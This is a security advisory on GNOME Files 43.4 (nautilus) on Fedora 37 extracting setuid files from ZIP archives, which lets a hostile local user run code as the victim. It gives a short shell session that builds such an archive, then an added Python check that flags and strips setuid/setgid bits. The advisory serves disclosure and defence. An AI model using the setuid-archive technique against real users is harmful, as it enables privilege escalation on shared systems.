- GNOME Files 43.4 Privilege Escalation
- Authored by Georgi Guninski
GNOME Files version 43.4 (nautilus) on Fedora 37 will extract zip archives with setuid files for other user identifiers that can be leveraged to escalate privileges.
- systems | linux, fedora
- SHA-256 | ac80117ac673973985c2dd78f43ddd88009c6d2d28c771696ceaab5aceb3f410
Affected: GNOME Files 43.4 (nautilus) on Fedora 37
Description:
If a user A opens in GNOME Files a zip archive containing a
`setuid` file F, then F will be silently extracted to
a subdirectory of CWD.
If F is accessible by a hostile local user B and B executes F,
then F will be executed as user A.
tar(1) and unzip(1) are not vulnerable to this attack.
Session for creating the ZIP.
After that, just open f.zip in GNOME Files.
<pre>
[joro@fedora ~]$ umask
0022
[joro@fedora 2]$ mkdir /tmp/2 ; cd /tmp/2 ; echo hi > F ; chmod +xs F
[joro@fedora 2]$ zip f F ; zipinfo f
Archive: f.zip
Zip file size: 155 bytes, number of entries: 1
-rwsr-sr-x 3.0 unx 3 tx stor 23-Aug-05 12:38 F
[joro@fedora 2]$ ls -ld /tmp/2/
drwxr-xr-x. 2 joro joro 80 Aug 5 11:20 /tmp/2/
[joro@fedora 2]$
</pre>
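A defensive check for the behaviour described above, as an added example that is not part of the original advisory: it lists ZIP entries whose stored Unix mode carries setuid/setgid bits and extracts regular files with those bits stripped. The function names and the in-memory sample archive are constructed for illustration.

```python
import io
import os
import stat
import zipfile

SETID = stat.S_ISUID | stat.S_ISGID
UNIX = 3  # ZIP "version made by" host code for Unix ("unx" in zipinfo output)


def setid_entries(zf):
    """Return [(name, mode_string)] for entries that carry setuid/setgid bits."""
    hits = []
    for info in zf.infolist():
        mode = info.external_attr >> 16  # Unix st_mode is stored in the high 16 bits
        if info.create_system == UNIX and mode & SETID:
            hits.append((info.filename, stat.filemode(mode)))
    return hits


def extract_without_setid(zf, dest):
    """Extract everything; restore rwx bits on regular files, never setuid/setgid/sticky."""
    written = {}
    for info in zf.infolist():
        path = zf.extract(info, dest)  # zipfile sanitises ".." and absolute names
        mode = info.external_attr >> 16
        if info.create_system == UNIX and stat.S_ISREG(mode):
            os.chmod(path, stat.S_IMODE(mode) & 0o777)
            written[info.filename] = stat.S_IMODE(os.stat(path).st_mode)
    return written


def constructed_sample():
    """Constructed archive: entry F with the advisory's -rwsr-sr-x mode, plus a benign file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, perm in (("F", 0o6755), ("README", 0o644)):
            info = zipfile.ZipInfo(name)
            info.create_system = UNIX
            info.external_attr = (stat.S_IFREG | perm) << 16
            zf.writestr(info, "hi\n")
    return buf.getvalue()


if __name__ == "__main__":
    with zipfile.ZipFile(io.BytesIO(constructed_sample())) as zf:
        print(setid_entries(zf))
```
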